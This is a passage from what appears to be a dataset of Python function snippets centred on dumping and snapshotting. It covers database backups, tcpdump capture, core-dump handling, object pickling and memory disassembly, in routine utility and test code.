cmd, path='/',\n childFDs = {1: temp_fd, 2: \"r\"})\n os.close(temp_fd)\n\n success, status, stderr = yield self._proc.deferred()\n\n if not success:\n error(\"Tcpdump failed (exit status: %s):\" % status)\n error(stderr)\n os.unlink(temp_file)\n defer.returnValue(None)\n else:\n info(\"Tcpdump started.\")\n defer.returnValue(temp_file)", "def snapshot_mib(self):\n db_copy = None\n number_of_commands = None\n\n try:\n max_tries = MibResyncTask.max_db_copy_retries - 1\n\n for retries in range(0, max_tries + 1):\n # Send MIB Upload so ONU snapshots its MIB\n try:\n self.strobe_watchdog()\n number_of_commands = yield self.send_mib_upload()\n\n if number_of_commands is None:\n if retries >= max_tries:\n db_copy = None\n break\n\n except (TimeoutError, ValueError) as e:\n self.log.warn('timeout-or-value-error', e=e)\n if retries >= max_tries:\n raise\n\n self.strobe_watchdog()\n yield asleep(MibResyncTask.db_copy_retry_delay)\n continue\n\n # Get a snapshot of the local MIB database\n db_copy = self._device.query_mib()\n # if we made it this far, no need to keep trying\n break\n\n except Exception as e:\n self.log.exception('mib-resync', e=e)\n raise\n\n # Handle initial failures\n\n if db_copy is None or number_of_commands is None:\n raise MibCopyException('Failed to snapshot MIB copy after {} retries'.\n format(MibResyncTask.max_db_copy_retries))\n\n returnValue((db_copy, number_of_commands))", "def dump(self, tag=None):\n return self.dump_to(sys.stdout.buffer, tag=tag)", "def weekly(dbname, as_username='postgres'):\n\n filename = '{dbname}-{indate}.dump.sql'.format(\n dbname=dbname, indate=datetime.now().strftime('%Y-%m-%d'))\n backup_weekly_dir = os.path.join(BACKUPS_STORE_DIR, 'weekly')\n if not os.path.isdir(backup_weekly_dir):\n os.makedirs(backup_weekly_dir)\n\n dumpfile = execute_pgdump(dbname, as_username)\n filename = os.path.join(backup_weekly_dir, filename)\n logger.info('moving {src} into {dst}'.format(src=dumpfile, dst=filename))\n shutil.move(dumpfile, filename)\n logger.info('{dst} has a size of {size} bytes.'.format(\n dst=filename, size=get_file_size(filename)))", "def FullDump(reader, heap):\n def dump_region(reader, start, size, location):\n print()\n while start & 3 != 0:\n start += 1\n size -= 1\n location += 1\n is_executable = reader.IsProbableExecutableRegion(location, size)\n is_ascii = reader.IsProbableASCIIRegion(location, size)\n\n if is_executable is not False:\n lines = reader.GetDisasmLines(start, size)\n for line in lines:\n print(FormatDisasmLine(start, heap, line))\n print()\n\n if is_ascii is not False:\n # Output in the same format as the Unix hd command\n addr = start\n for i in range(0, size, 16):\n slot = i + location\n hex_line = \"\"\n asc_line = \"\"\n for i in range(16):\n if slot + i < location + size:\n byte = ctypes.c_uint8.from_buffer(reader.minidump, slot + i).value\n if byte >= 0x20 and byte < 0x7f:\n asc_line += chr(byte)\n else:\n asc_line += \".\"\n hex_line += \" %02x\" % (byte)\n else:\n hex_line += \" \"\n if i == 7:\n hex_line += \" \"\n print(\"%s %s |%s|\" % (reader.FormatIntPtr(addr),\n hex_line,\n asc_line))\n addr += 16\n\n if is_executable is not True and is_ascii is not True:\n print(\"%s - %s\" % (reader.FormatIntPtr(start),\n reader.FormatIntPtr(start + size)))\n print(start + size + 1);\n for i in range(0, size, reader.PointerSize()):\n slot = start + i\n maybe_address = reader.ReadUIntPtr(slot)\n heap_object = heap.FindObject(maybe_address)\n print(\"%s: %s\" % (reader.FormatIntPtr(slot),\n reader.FormatIntPtr(maybe_address)))\n if heap_object:\n heap_object.Print(Printer())\n print()\n\n reader.ForEachMemoryRegion(dump_region)", "def run(self, pdb_file):\n wd = os.getcwd()\n base = os.path.basename(pdb_file)\n\n with TempFolder() as tmp:\n shutil.copy(os.path.expanduser(pdb_file), tmp.name)\n os.chdir(tmp.name)\n Shell.run('{0} {1} {2}'.format(self.binary,\n os.path.join(tmp.name, base),\n self.acc))\n summary = '.'.join([os.path.splitext(base)[0], 'sum'])\n out = self.parse(os.path.join(tmp.name, summary))\n os.chdir(wd)\n\n return out", "def dump(self):\n for cache_set in self.cache_sets:\n cache_set.dump()", "def coredump(ctx, config):\n log.info('Enabling coredump saving...')\n archive_dir = misc.get_archive_dir(ctx)\n run.wait(\n ctx.cluster.run(\n args=[\n 'install', '-d', '-m0755', '--',\n '{adir}/coredump'.format(adir=archive_dir),\n run.Raw('&&'),\n 'sudo', 'sysctl', '-w', 'kernel.core_pattern={adir}/coredump/%t.%p.core'.format(adir=archive_dir),\n ],\n wait=False,\n )\n )\n\n try:\n yield\n finally:\n run.wait(\n ctx.cluster.run(\n args=[\n 'sudo', 'sysctl', '-w', 'kernel.core_pattern=core',\n run.Raw('&&'),\n # don't litter the archive dir if there were no cores dumped\n 'rmdir',\n '--ignore-fail-on-non-empty',\n '--',\n '{adir}/coredump'.format(adir=archive_dir),\n ],\n wait=False,\n )\n )\n\n # set status = 'fail' if the dir is still there = coredumps were\n # seen\n for rem in ctx.cluster.remotes.iterkeys():\n r = rem.run(\n args=[\n 'if', 'test', '!', '-e', '{adir}/coredump'.format(adir=archive_dir), run.Raw(';'), 'then',\n 'echo', 'OK', run.Raw(';'),\n 'fi',\n ],\n stdout=StringIO(),\n )\n if r.stdout.getvalue() != 'OK\\n':\n log.warning('Found coredumps on %s, flagging run as failed', rem)\n set_status(ctx.summary, 'fail')\n if 'failure_reason' not in ctx.summary:\n ctx.summary['failure_reason'] = \\\n 'Found coredumps on {rem}'.format(rem=rem)", "def snapshot(self, instance, name):\n # TODO(imsplitbit): Need to implement vzdump\n pass", "def dumpme(self) :\n fileName = \"./data/oP4_ModelBuilder.dump\"\n with open(fileName,\"wb\") as dumpedFile:\n oPickler = pickle.Pickler(dumpedFile)\n oPickler.dump(self)", "def parse_dump_file(self, ws_dump, ws_dest, fn_dump):\n self.message('BEGIN: [{}] -> [{}]:'.format(fn_dump.upper(), self.fn_destination.upper()), True)\n dump_headers = {} # column headers from our dump file\n dest_headers = {} # column headers from our destination file\n comm_headers = {} # column headers common to both files\n\n rows_updated = 0\n rows_appended = 0\n\n # get a list of dump column headers so we can use them for searching\n for x, cell in enumerate(ws_dump[1]):\n dump_headers[cell.value] = x + 1\n\n # get a list of destination column headers so we can use them for searching\n for x, cell in enumerate(ws_dest[1]):\n dest_headers[cell.value] = x + 1\n\n # get a list of column headers from both sheets using column locations from destination\n for key1, val1 in dest_headers.items():\n for key2, val2 in dump_headers.items():\n if key1 == key2:\n comm_headers[key1] = val1\n break\n\n # now parse our dump file to arg_check for duplicate 'keys'\n if self.worksheet_has_duplicate_keys(ws_dump, fn_dump):\n return\n\n # now parse our destination file to arg_check for duplicate 'keys'\n if self.worksheet_has_duplicate_keys(ws_dest, self.fn_destination):\n return\n\n # let's case-sensitive arg_check our column headers for differences if any.\n s1 = set(dump_headers)\n s2 = set(dest_headers)\n\n if s1 != s2:\n s1_diff = (s1 - s2)\n s2_diff = (s2 - s1)\n if len(s1_diff) > 0:\n self.warning('{} exclusively contains the following columns: '.format(fn_dump.upper()))\n for x, item in enumerate(s1_diff):\n self.warning('\\t{}. \\'{}\\''.format(x + 1, str(item)))\n if len(s2_diff) > 0:\n self.warning('{} exclusively contains the following columns: '.format(self.fn_destination.upper()))\n for x, item in enumerate(s2_diff):\n self.warning('\\t{}. \\'{}\\''.format(x + 1, str(item)))\n\n dump_dict = self.parse_worksheet_into_dictionary(ws_dump, comm_headers)\n dest_dict = self.parse_worksheet_into_dictionary(ws_dest, comm_headers)\n comb_dict = {**dest_dict, **dump_dict}\n\n for a, b in enumerate(comb_dict): # enumerate dictionary key\n key = b\n dump_row = dump_dict[key]\n for c, d in enumerate(dump_row): # enumerate dictionary rows\n value = dump_row[d]['value']\n result = self.get_cell_details(ws_dest, key, d)\n if result['cell_found']: # does this key exist in destination\n this = ws_dest.cell(row=dest_dict[b][d]['row'], column=dest_dict[b][d]['col'])\n if this.value != value: # update destination cell\n self.cells_updated += 1\n self.format_cell_updated(this, value)\n else:\n self.format_cell_reset(this)\n else: # key is not present so we are creating a new row\n if result['key_found']: # we need to add the remaining values for columns\n this = ws_dest.cell(row=result['row'], column=result['col'])\n else: # append a new row and add the primary key\n this = ws_dest.cell(row=ws_dest.max_row + 1, column=comm_headers[d])\n\n self.format_cell_updated(this, value)\n self.rows_appended += 1\n\n if self.is_date(this.value):\n if self.format_date(this.value) < self.format_date(datetime.now()):\n self.format_cell_date_passed(this)\n\n # save our workbook with all changes\n self.cells_updated += rows_updated\n self.rows_appended += rows_appended\n self.message('END: [{}] [Updates: {}] [Additions: {}]'.format(fn_dump.upper(), rows_updated, rows_appended))\n\n # set the active worksheet so it opens on this tab\n if not self.arg_check:\n self.wb_destination.active = self.wb_destination['Hypercare Incidents']\n self.wb_destination.save(self.fn_destination)", "def execute_pgdump(dbname, as_username='postgres'):\n\n filedescriptor, filename = tempfile.mkstemp()\n statement = get_database_backup_statement(filename, dbname, as_username)\n BackupterStart.send(statement)\n os.system(statement)\n BackupterEnd.send(filename)\n\n return filename", "def load_dump(self):\n # Create uuid extension\n command = \"CREATE EXTENSION IF NOT EXISTS \\\"uuid-ossp\\\";\"\n try:\n self.cursor.execute(command)\n except:\n # uuid extension already exists\n pass\n print(\"uuid extension couldn't be created\")\n\n path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'SQL', 'fa2909.sql')\n try:\n self.cursor.execute(open(path, \"r\").read())\n print('table was created successfully')\n return True\n except:\n # error\n print(\"table couldn't be created\")\n return False", "def mysqldump():\n run(\"mysqldump -u database_user database_name -p > ~/tmp/exported_db.sql\")", "def dumpfile(self, dump_path, abspath=True):\n if dump_path is None:\n self._p('[dumpfile] (null)')\n else:\n if abspath:\n dump_path = os.path.abspath(dump_path)\n self._p('[dumpfile] \"{}\"'.format(dump_path))", "def test_execute_dump_all_transaction(self):\n\n instruction = Instruction(\"dump()\")\n\n with std_out() as (out, err):\n self.transaction_manager.execute(instruction)\n\n output = out.getvalue().strip()\n\n self.assertEqual(output, \"{1: {'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}, 2: {'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x11': { x11: 110 }, 'x12': { x12: 120 }, 'x1': { x1: 10 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}, 3: {'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}, 4: {'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x3': { x3: 30 }, 'x12': { x12: 120 }, 'x13': { x13: 130 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}, 5: {'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}, 6: {'x14': { x14: 140 }, 'x20': { x20: 200 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x15': { x15: 150 }, 'x4': { x4: 40 }, 'x5': { x5: 50 }}, 7: {'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}, 8: {'x14': { x14: 140 }, 'x20': { x20: 200 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x7': { x7: 70 }, 'x4': { x4: 40 }, 'x17': { x17: 170 }}, 9: {'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}, 10: {'x19': { x19: 190 }, 'x14': { x14: 140 }, 'x18': { x18: 180 }, 'x10': { x10: 100 }, 'x8': { x8: 80 }, 'x9': { x9: 90 }, 'x16': { x16: 160 }, 'x2': { x2: 20 }, 'x12': { x12: 120 }, 'x6': { x6: 60 }, 'x20': { x20: 200 }, 'x4': { x4: 40 }}}\")", "def dump(self, obj):\r\n return self.localpath.dump(obj)", "def minimize(self,amberpdbpath,pdbfile,amberminpath):\n minfile=os.path.join(self.mainpath,'min.in')\n res='';pdbname=os.path.join(amberpdbpath,pdbfile);leap=os.path.join(amberpdbpath,'leap.in')\n top=os.path.join(amberpdbpath,pdbfile+'.prmtop');crd=os.path.join(amberpdbpath,pdbfile+'.inpcrd')\n rst=os.path.join(amberpdbpath,pdbfile+'min.rst');minout=os.path.join(amberpdbpath,'min.out')\n res+='source leaprc.protein.ff14SB' +'\\n'\n res+='source leaprc.gaff' +'\\n'\n res+='source leaprc.water.tip3p' +'\\n'\n res+='com=loadpdb '+pdbname +'\\n'\n res+='setbox com \"vdw\"' +'\\n'\n res+='addIons com Na+ 0' +'\\n'\n res+='addIons com Cl- 0'+'\\n'\n res+='saveamberparm com '+top+' '+crd +'\\n'\n res+='quit'\n f=open(leap,'w');f.write(res);f.close()\n os.system('tleap -s -f '+leap)\n os.system('pmemd -O -i '+minfile+' -p '+top+' -c '+crd+' -r '+rst+' -ref '+pdbname+'.inpcrd -o '+minout)\n res='';res+='parm '+top+'\\n';res+='trajin '+rst+'\\n';res+='strip :WAT,Na+,Cl- \\n';res+='trajout '+rst+'stri \\n'\n f=open(leap,'w');f.write(res);f.close()\n os.system('cpptraj < '+leap) \n res='';res+='parm '+top+'\\n';res+='parmstrip :WAT,Na+,Cl- \\n';res+='parmwrite out '+top+'stri \\n'\n f=open(leap,'w');f.write(res);f.close()\n os.system('cpptraj < '+leap) \n os.system('ambpdb -p '+top+'stri -c '+rst+'stri > '+amberminpath+'/'+pdbfile+'.pdb')", "def get_idumpload(self):\n return self.read_register(4102, 1, 3)", "def dump_DB(self):\n\t\tprint 'Dumping Data Base...'\n\t\tp=cPickle.Pickler(open(self.DB_file, 'wb'))\n\t\tp.fast=True\n\t\tp.dump(self.DB)\n\t\tprint 'Dumping completed'\n\t\t#stream.close()\n\t\t#return ", "def _run_operation(self, operation, logdir):\n op_start_time = datetime.datetime.now()\n drush_cmd = subprocess.Popen([self.drupal.drush_bin,\n \"--root=\" + self.drupal.root,\n \"--uri=\" + self.drupal.uri,\n \"maps-import\",\n str(self.id),\n \"--op=\" + operation],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n (drush_out, drush_err) = drush_cmd.communicate()\n op_end_time = datetime.datetime.now()\n\n self._log_operation(operation, logdir,\n drush_out, drush_err)\n self._update_operation_state(operation, op_start_time, op_end_time)", "def profile(script, argv, timer, pickle_protocol, dump_filename, mono):\n filename, code, globals_ = script\n sys.argv[:] = [filename] + list(argv)\n __profile__(filename, code, globals_,\n timer=timer, pickle_protocol=pickle_protocol,\n dump_filename=dump_filename, mono=mono)", "def madmp_import(file, dry_run, hard_sync):\n if not file or not os.path.isfile(file):\n click.secho(\"'%s' is not a file\" % file, file=sys.stderr, fg=\"red\")\n return\n\n with open(file, \"r\") as dmp_file:\n dmp_dict = json.load(dmp_file).get(\"dmp\", {})\n dmp = convert_dmp(dmp_dict, hard_sync=hard_sync)\n\n click.echo(\"DMP %s has %s datasets\" % (dmp.dmp_id, len(dmp.datasets)))\n\n for dataset in dmp.datasets:\n recid = \"[no record]\"\n\n if dataset.record:\n pid = dataset.record.pid\n recid = \"[recid: %s]\" % pid.pid_value\n\n click.echo(\" DS: %s %s\" % (dataset.dataset_id, recid))\n\n if dry_run:\n db.session.rollback()\n else:\n db.session.add(dmp)\n db.session.commit()", "def snapshot(self, filename=None):\n if filename:\n self.command(\"snapshot %(filename)s\" % locals())\n else:\n self.command(\"snapshot\")", "def run_dumpbin(self, *dumpbin_args):\n assert sys.platform in ('win32', 'cygwin')\n cmd = os.environ.get('COMSPEC', 'cmd.exe')\n arguments = [cmd, '/c', self.vsvars_path, '&&', 'dumpbin']\n arguments.extend(dumpbin_args)\n proc = subprocess.Popen(arguments, stdout=subprocess.PIPE)\n output = proc.communicate()[0]\n assert not proc.returncode\n return output", "def rundmp(seq_path,msa_path,skiphhblits=False,skipdmp=False):\n if HHBLITS_VIA_DMP:\n msa_path = os.path.join(os.path.splitext(seq_path)[0]+\".a3m\")\n \n if HHBLITS_VIA_DMP and not skiphhblits:\n dmp_exec = '\"'+DMP_PATH+'\"' + ' -i '+ seq_path\n else:\n dmp_exec = '\"'+DMP_PATH+'\"' + ' -i '+ seq_path + ' -a ' + msa_path\n \n if not skipdmp:\n try: \n stdoutput=subprocess.check_output(dmp_exec,stderr=subprocess.STDOUT,shell=True)\n except:\n interrupt(\"ERROR: An error occurred during the execution of DeepMetaPSICOV.\")\n printout(stdoutput)\n else:\n printout('Skipping DeepMetaPSICOV execution.')\n\n if HHBLITS_VIA_DMP: \n msaa3mfile = os.path.join(os.path.basename(os.path.splitext(seq_path)[0])+\".a3m\")\n msaa3mpath = os.path.join(output_dir(),msaa3mfile)\n shutil.copyfile(msa_path,msaa3mpath)\n \n parsedmsa, msajonespath = msafilesgen(msaa3mpath)\n return parsedmsa, msajonespath", "def OnSim42RunCmdFileDump(self, event):\n path = self.PromptPathOpenCmd()\n if not path: return\n pathOut = self.PromptPathSaveCmd()\n if not pathOut: return\n f = open(pathOut, 'w')\n oldOut = self.sim42interp.cmd.output\n oldOutSys = sys.stdout\n self.sim42interp.cmd.output = f\n sys.stdout = f\n self.IgnoreMessages()\n self.RunCmdFile(path)\n self.UnIgnoreMessages()\n f.close()\n self.sim42interp.cmd.output = oldOut\n sys.stdout = oldOutSys", "def dump_pre(self,status):\n pass", "def test_build_stump(self):\n D = np.mat(np.ones((5, 1)) / 5)\n best, min_err, best_estimate =\\\n ada_boost.build_stump(self.larger_matrix,\n self.larger_class_labels,\n D)\n expected = {'threshold': 1.3, 'dim': 0, 'inequal': 'lt'}\n self.assertEqual(best, expected)", "def dump_data(self,filename,dump_id):\n # get pure data copy\n data = [ d.get_pure_data_copy() for d in self.plotter.data ]\n # full file name of the file with manipulator dump\n filename=tdc_Filenames.get_full_vis_filename(dump_id, filename+'.pickle')\n pickle.dump( data, open(filename,'w') )\n print '\\nContent dumped in \"%s\" \\n' % filename", "def dump(self):\n self.hasher.update_time_dicts() # Makes the time measurements available\n\n print(\" Creating a results folder in {} and storing all results there.\".format(self.config.output_dir))\n if not os.path.isdir(self.config.output_dir):\n os.mkdir(self.config.output_dir)\n\n print(\" Dumping profile ...\")\n profile_file_name = \"{}_{}_profile\".format(self.name, self.config.mode)\n with open(os.path.join(self.config.output_dir, profile_file_name), \"a\") as file:\n profile = {\"config\": self.config.dump(),\n \"hash\": self.hasher.hash_time_dict,\n \"find\": self.hasher.find_time_dict}\n\n json.dump(profile, file)\n\n print(\" Dumping matches ...\")\n for i, match in enumerate(self.__matched_offsets):\n if int(match[0] > match[1]):\n offset_a = match[1]\n offset_b = match[0]\n else:\n offset_a = match[0]\n offset_b = match[1]\n\n match_file_name = \"{}_{}_{}_{}\".format(self.name, self.config.mode, offset_a, offset_b)\n with open(os.path.join(self.config.output_dir, match_file_name), \"w\") as file:\n infos = \"Config:\\n: {}\".format(self.config)\n text_a = \"\"\n text_b = \"\"\n if self.config.dump_text:\n text_a = \"Text:\\n{}\".format(self.__offset_text_map.get(offset_a))\n text_b = \"Text:\\n{}\".format(self.__offset_text_map.get(offset_b))\n\n file.write(\"{}\\n\\n{}\\n\\n{}\\n\\n{}\".format(infos, text_a, \"#\"*25, text_b))\n\n if self.config.dump_graph:\n print(\" Creating graphs ...\")\n x1, x2 = list(), list()\n y1, y2 = list(), list()\n t_all = 0\n for element, t in self.hasher.hash_time_dict.items():\n t_all += t\n x1.append(element)\n y1.append(t_all)\n\n t_all = 0\n for element, t in self.hasher.find_time_dict.items():\n t_all += t\n x2.append(element)\n y2.append(t_all)\n\n self.__plot(os.path.join(self.config.output_dir, \"hash_time\"), x1, y1)\n self.__plot(os.path.join(self.config.output_dir, \"find_time\"), x2, y2)\n\n print(\"\\n\\n\")\n\n return", "def take_memory_snapshot(*args):\n return _ida_segment.take_memory_snapshot(*args)", "def dump_me(self, fileName=None) :\n if fileName is None :\n fileName = \"./data/oP4_ModelBuilder.dump\"\n else :\n pass\n with open(fileName,\"wb\") as dumpedFile:\n oPickler = pickle.Pickler(dumpedFile)\n oPickler.dump(self)", "def dump_objects():\n pass", "def _mst_calc(dest_tifs, params, tiles, preread_ifgs):\n process_tiles = mpiops.array_split(tiles)\n log.info('Calculating minimum spanning tree matrix')\n\n def _save_mst_tile(tile, i, preread_ifgs):\n \"\"\"\n Convenient inner loop for mst tile saving\n \"\"\"\n mst_tile = mst.mst_multiprocessing(tile, dest_tifs, preread_ifgs, params)\n # locally save the mst_mat\n mst_file_process_n = join(params[cf.TMPDIR], 'mst_mat_{}.npy'.format(i))\n np.save(file=mst_file_process_n, arr=mst_tile)\n\n for t in process_tiles:\n _save_mst_tile(t, t.index, preread_ifgs)\n log.debug('Finished mst calculation for process {}'.format(mpiops.rank))\n mpiops.comm.barrier()", "def collect_full_core_dump(core_dump_dir=\"\", filename=\"\"):\r\r\n\r\r\n loggerModem = logging.getLogger(__name__ + 'collect_full_core_dump')\r\r\n\r\r\n core_dump_path = (os.path.join(core_dump_dir, filename))\r\r\n\r\r\n icera_tools_bin_path = os.sep.join(os.environ['PL1_WCDMA_TEST_ROOT'].split(os.sep)[:]+['common', 'icera'])\r\r\n\r\r\n get_crash_dump_log(core_dump_dir=core_dump_dir, icera_utils_path=icera_tools_bin_path)", "def snapshot(self, agent_memory):\n\n read_cmd = \"SELECT \"\n for r in self.TABLE_COLUMNS:\n read_cmd += r + \", \"\n read_cmd = read_cmd.strip(\", \")\n read_cmd += \" FROM \" + self.TABLE + \" WHERE uuid=?\"\n data = agent_memory._db_read_one(read_cmd, self.memid)\n if not data:\n raise (\"tried to snapshot nonexistent memory\")\n\n archive_memid = self.new(agent_memory, snapshot=True)\n new_data = list(data)\n new_data[0] = archive_memid\n\n if hasattr(self, \"ARCHIVE_TABLE\"):\n archive_table = self.ARCHIVE_TABLE\n else:\n archive_table = self.TABLE\n write_cmd = \"INSERT INTO \" + archive_table + \"(\"\n qs = \"\"\n for r in self.TABLE_COLUMNS:\n write_cmd += r + \", \"\n qs += \"?, \"\n write_cmd = write_cmd.strip(\", \")\n write_cmd += \") VALUES (\" + qs.strip(\", \") + \")\"\n agent_memory._db_write(write_cmd, *new_data)\n link_archive_to_mem(agent_memory, self.memid, archive_memid)", "def mergeAndSaveFile(dumpMetaFile, chunkSizeFile, outFile):\n dump = open (dumpMetaFile, \"r\")\n chunk = open (chunkSizeFile, \"r\")\n out = open (outFile, \"w\")\n \n cline = \"\"\n cline = chunk.readline()\n cline = cline.rstrip(\"\\n\")\n\n while dump:\n dline = dump.readline()\n if not dline:\n break\n dline = dline.rstrip(\"\\n\")\n \n # Split line parts \n dlineParts = dline.split(' ')\n \n # Read lines from chunkSize\n numEntries = int(dlineParts[2])\n \n entries = []\n for i in range(numEntries):\n entries.append([dlineParts[i*3 + 3], dlineParts[i*3 + 4], dlineParts[i*3 + 5], 0])\n #entries[i][0] = dlineParts[i*3 + 3]\n #entries[i][1] = dlineParts[i*3 + 4]\n #entries[i][2] = dlineParts[i*3 + 5]\n #entries[i][3] = 0\n\n while True:\n clineParts = cline.split(' ')\n if ((dlineParts[0] == clineParts[0]) and (dlineParts[1] == clineParts[1])):\n for i in range(numEntries):\n if ((entries[i][0] == clineParts[3]) and (entries[i][1] == clineParts[4])):\n entries[i][3] = clineParts[2]\n else:\n break\n cline = chunk.readline()\n cline = cline.rstrip(\"\\n\")\n if not cline:\n break\n\n # Print output\n out.write(dlineParts[0]+\" \"+dlineParts[1]+\" \"+dlineParts[2]+\" \")\n for i in range(numEntries):\n out.write(str(entries[i][3])+\" \"+entries[i][0]+\" \"+entries[i][1]+\" \"+entries[i][2]+\" \")\n out.write(\"\\n\")\n out.close()", "def enable_dump_permission(sdk_path, device_id, dest_dir, package_name):\n\n print 'Starting dump permission grant'\n perm_command = [os.path.join(sdk_path, 'platform-tools', 'adb'),\n '-s', device_id,\n 'shell',\n 'pm', 'grant', package_name,\n 'android.permission.DUMP']\n print perm_command\n log_file_path = os.path.join(dest_dir, 'logs', 'enable_dump_perm.log')\n with open(log_file_path, 'w') as log_file:\n try:\n subprocess.call(perm_command,\n stdout=log_file,\n stderr=subprocess.STDOUT,\n shell=False)\n except OSError:\n print 'ERROR executing permission grant.'", "def core_dump(self):\r\r\n loggerModem = logging.getLogger(__name__ + 'core_dump')\r\r\n cmd_l=[r'at%debug=0', r'at%debug=2']\r\r\n cmd_str='\\r\\n'.join(cmd_l)\r\r\n\r\r\n text_str = \"AT command\"\r\r\n if self.dumpfile:\r\r\n loggerModem.debug(\"Core file : %s\" % self.dumpfile)\r\r\n loggerModem.debug(\"%-15s:\\t%s\" %(text_str, cmd_str))\r\r\n with open(self.dumpfile, 'wb') as fd:\r\r\n cmd_str = cmd_str + '\\r\\n'\r\r\n self.serObj.write(cmd_str) # write a string\r\r\n len_rd=0\r\r\n response = self.serObj.read(2**16)\r\r\n while len(response)>0:\r\r\n len_rd += len(response)\r\r\n loggerModem.debug(\"read %s bytes, current_len=%s\" % (len(response), len_rd))\r\r\n fd.write(response)\r\r\n response = self.serObj.read(2**16)\r\r\n loggerModem.info(\"Created core dump: %s\" % self.dumpfile)\r\r\n else:\r\r\n loggerModem.info(\"No core dump as no dump file specified!\")", "def dump(memory, startad, endad):\n res = \"\"\n gap = 0\n \n # but not always\n if cpu.thumb_mode: instr_size = 2\n else: instr_size = 4\n \n \n # Made the caller align the address\n #startad = (startad//instr_size)*instr_size\n #endad = (endad//instr_size)*instr_size\n \n i = startad\n \n addr = startad\n while addr <= endad:\n if i <= addr:\n res += new_section_check(addr)\n #if is_const_section(addr): # for debug\n # pass\n membytes = cpu.read_memory(addr, instr_size)\n if membytes is not None:\n memword = int.from_bytes(membytes, 'little')\n else:\n print(\"Reading uninitialized memory, address = {:#x}\".format(addr))\n memword = 0 # should this happen\n \n if is_code_section(addr):\n if cpu.thumb_mode: \n #if is_thumb32(memword):\n # instr_size = 4\n #else:\n instr_size = 2\n else:\n instr_size = 2 \n \n if memword == 0: \n gap += 1\n i+= instr_size\n else:\n if gap > 0:\n res += \"*** gap of {:d} halfword\".format(gap)\n if gap > 1:\n res += 's'\n res += '\\n'\n gap = 0 \n if addr in symdict:\n res += '\\n---------' + '<' + symdict[addr] + '>:\\n'\n mbytes = membytes[0:instr_size]\n instr = cpu.read_memory_int(addr, 4)\n \n tmp_res, actual_instr_size = disass.disass(addr, \n instr, \n cpu.thumb_mode)\n if cpu.thumb_mode:\n if actual_instr_size == 4:\n extrabytes = my_hex(cpu.read_memory(addr+2, 2))\n else:\n extrabytes = \" \"\n else:\n extrabytes = \"\"\n res += \"{:08x} \".format(addr) + my_hex(\n mbytes) + \" \" + extrabytes + \" \" + tmp_res + \"\\n\"\n i += actual_instr_size # Thumb 2 could be either \n else:\n \n if (addr % 4) == 0:\n instr_size = 4 # not code, not an instruction\n if memword != 0:\n if gap > 1:\n res += \"*** repeats for {:d} word\".format(gap-1)\n if (gap-1) > 1:\n res += 's'\n res += '\\n'\n gap = 0 \n mbytes = cpu.read_memory(addr, 4)\n res += \"{:08x} \".format(addr)+'.word '+my_hex(mbytes)+\"\\n\"\n else:\n if gap == 0:\n res += \"{:08x} \".format(addr)+'.word 0\\n'\n gap += 1\n i += 4\n else: \n instr_size = 2\n res += \"{:08x} \".format(addr)+'.word '+my_hex(membytes)+\"\\n\"\n i += 2 \n addr = cpu.get_next_addr(addr, instr_size)\n if addr is None:\n addr = endad+instr_size \n \n return res", "def test_backup_restore_with_dgm(self):\n self.load_to_dgm()\n self.backup_create()\n self.backup_cluster_validate()\n self.backup_restore_validate(compare_uuid=False, seqno_compare_function=\">=\")", "def dump(self) -> None:\n ...", "def dump(self, dest: Optional[str] = None) -> None:\n if dest is None:\n dest = self._default_dump_dest\n with open(dest, \"wb+\") as f:\n dill.dump(self, f)", "def dump(self, obj, bin=1):\n f = self.open(\"wb\")\n import pickle\n\n try:\n error.checked_call(pickle.dump, obj, f, bin)\n finally:\n f.close()", "def intf_MMDUMP(E):\n print(mmout.mmdump(MMEL))", "def test_backup_restore_with_warmup(self):\n gen = BlobGenerator(\"ent-backup\", \"ent-backup-\", self.value_size, end=self.num_items)\n self._load_all_buckets(self.master, gen, \"create\", 0)\n self.backup_create()\n NodeHelper.do_a_warm_up(self.backupset.cluster_host)\n self.sleep(30)\n self.backup_cluster_validate()\n self.backup_restore_validate(compare_uuid=False, seqno_compare_function=\">=\")\n \"\"\" only membase bucket has warmup state \"\"\"\n if self.bucket_type == \"membase\":\n NodeHelper.wait_warmup_completed([self.backupset.cluster_host])", "def is_dump():\n return sync_mode in (SyncMode.DUMP_LOCAL, 